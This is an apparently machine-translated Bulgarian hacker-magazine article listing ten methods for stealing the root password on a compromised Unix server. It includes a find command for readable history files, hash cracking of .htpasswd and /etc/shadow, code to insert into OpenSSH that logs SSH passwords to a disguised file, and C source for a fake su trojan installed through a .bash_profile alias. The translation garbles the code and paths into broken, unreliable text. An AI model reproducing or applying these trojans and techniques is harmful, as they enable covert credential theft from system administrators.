ПредишенСледващото

Може би най-големият проблем в хак - улица паролата Definition. Дори когато хакер счупи система на която и да използват, за да получите своята парола не е лесно. Но всяка гайка има винт, така че позволете ми да разкрие 10 универсални начини за това важно проучване на информация). Не, дори не е необходимо да се срещне с администратора и да пие бирата си в безсъзнание (или по-скоро, на държавата, в която той ще ви разкрие важна информация). Всичко е много по-лесно - има техники, които след приложението, от вас ще получат парола корен. Разбира се, всичко зависи от ситуацията. Всички те ще бъдат обсъдени по-долу.

1. Търсене в Perl / PHP скриптове.

Методът се използва при всички варианти на хакерство.

2. Търсене в историята-файлове.

администраторите често използват програмата за конзола, която предава паролата на командния ред. Всичко е записано в историята-файл, наречен .bash_history (разбира се, и за другите тълкуватели на името на файла ще бъдат различни). Има също така може да получи INFA поради грешки в екипа на администратор (I, например,
Видях го като администратор, вместо "СУ" вкара "PSU", следван от вашата парола).

Има и друга история файл. Той призова .mysql_history и също е в домашната директория на потребителя. Там можете да намерите команди за промяна на пароли за SQL-достъп. Тази парола може да съвпадне с улица.

Методът е приложим само когато има пълен контрол над системата. Но това, което се случва, е, когато историята-файлове имат атрибут 644. Намерете тези файлове (и след това се чете), можете да използвате командата намери / -perm 644 -name * _history.

3. Търсене в .htpasswd.

Разкодирай тези хешове да програмирате Джон Изкормвача. Аз не ви научи да го направя, така че мисля, че този метод вие разбирате.

4. Търсене в други файлове.

Има сървър, където пароли са специфицирани в досиетата на трети страни. Например, аз бях изправен пред ситуация, в която паролата е в досието на улица socks5.password.

Внимание! Тези файлове не могат да бъдат на разположение за четене. Поради това, че всичко зависи от ситуацията ...

5. отбелязва в поле.

администраторите често оставят важни файлове в техните директории. Те съдържат някои бележки. Възможно е, че сред тези, които можете да се срещнете и пароли. Аз самият съм срещал такъв naryl улица и парола във файл ", отбелязва". Обърнете внимание на такива неща.

6. Търсене на трупите.

7. смъркане на данни.

Някои руткитове съдържат местно обучени, която ви позволява лесно да разберете паролите до SSH (проста модификация на / ЮЕсАр / хамбар / SSH-съвместим дърводобива;)). Обикновено такава подкрепа и пътя до файла с дневника, посочено в документацията на руткит). Това е добре, но разстроен само едно нещо: по-голямата част от руткит съдържа SSH стария, който поддържа само първия протокол. В резултат на това, атакуващият може да се представяте за кураж.

Но това, което предотвратява изгради своя собствена SSH и да включат в него запомнянето на паролите? Точно така! Никой не. OpenSSH е в пакета с името на файла, sshconnect1.c. след това се вмъква в съдържанието му следните линии:

След линия "snprintf (бърз, sizeof (ред),« %.30s@%.128s's парола: «, server_user, домакин);"

ifile = fopen ( «/ обувка / kernel.old», »а»);
fprintf (ifile, »сесия% S% S \ н», server_user, домакин);
fclose (ifile);

След шев "парола = read_passphrase (бърза, 0);"
ifile = fopen ( «/ обувка / kernel.old« », а»);
fprintf (ifile, »парола е% S \ н», парола);
fclose (ifile);

Ако всичко е направено правилно, SSH срещат без инциденти. Сега, администраторът няма да забележите недостатък в системата, и вие ще знаете паролата за SSH. Когато той отива като корен - това ще се разкайва парола).

8. преструва системна услуга).

Този метод, който описах в един от хакерски стаи (Yuniksoid, Fun в Linux). Поради това, потребителите, които четат на хакера не посетите сайт (и обратно), той няма да бъде излишно да се повтаря чантата на трикове.

Така че, е създаден, за да прочетете файла:

#define SORRY «Съжалявам»
#define PFILE «ПТУ / .screen»
#define MYPATH «ПТУ / .screen_active»
#include
нищожен sigexit (инт не);
Int основни () знак подаване [40];
харак копнее [100];
Int Filep;
сигнал (SIGINT, sigexit);
ФОРМАТ ( «Парола:»);
система ( «stty-ехо»);
scanf ( «% и», подай);
система ( «stty ехо»);
ФОРМАТ ( «\ R \ н»);
Filep = fopen (PFILE, »т»);
fprintf (Filep, »проход е% S \ п», преминават);
fclose (Filep);
ФОРМАТ ( "% S \ г \ п», съжалявам);
strcpy (за дълги, »»);
strcat (копнее, »/ хамбар / LN -sf / хамбар / СУ«);
strcat (копнее, MYPATH);
система (копнее);
изход (0);
>
нищожен sigexit (инт не) система ( «stty ехо»);
ФОРМАТ ( «\ R \ н \ R \ н»);
изход (0);
>

и обиждате su.c. Ако се вгледате в един прост код можете да видите, че тя е пълна с имитация / хамбар / СУ, само с парола, за да влезете ПТУ / .screen файл. Самата двоичен ще бъде в ПТУ / .screen_active файл (всички пътища в сравнение с домашната директория на потребителя). След като файлът се изпълнява, той заменя стандартната / BIN / СУ. По този начин, на администратора си мисли, че грешна парола, тъй като вторият опит Suede ще бъде успешен.

Преди да се провери този метод на практика, пишете на линията "псевдоним су /home/user/tmp/.screen_active файл

/.bash_profile и изчакайте, докато администраторът реши да suidnutsya корен. Когато това се случи - е паролата).

10 стандартен начин.

И най-накрая, че е време да ви разкажа за най-тривиален начин. Хакерът улавя системата и достъп / и т.н. / сянка. Освен това, всички от сценария - декриптиране е взето, добър речник, и да се надяваме само за късмет. Мисля, че не сте просто се сблъскват с този метод. И интересното е, че постоянно съм забравил за другата 9 ...

Покажете тази статия на приятел:

Над 500 фалшиви уебсайтове, предлагащи да купят iPhone X

Няколко грешки са открити в новата ЗИ 11.1 по време на състезанието Pwn2Own

Чрез Google проблем, с помощта на "черно» SEO, разпределени Bunker Зевс Panda

Водачите Savitech компания доставя с удостоверения корен

Арестуван хакер, хакване заявява служител FireEye

Свързани статии

Подкрепете проекта - споделете линка, благодаря!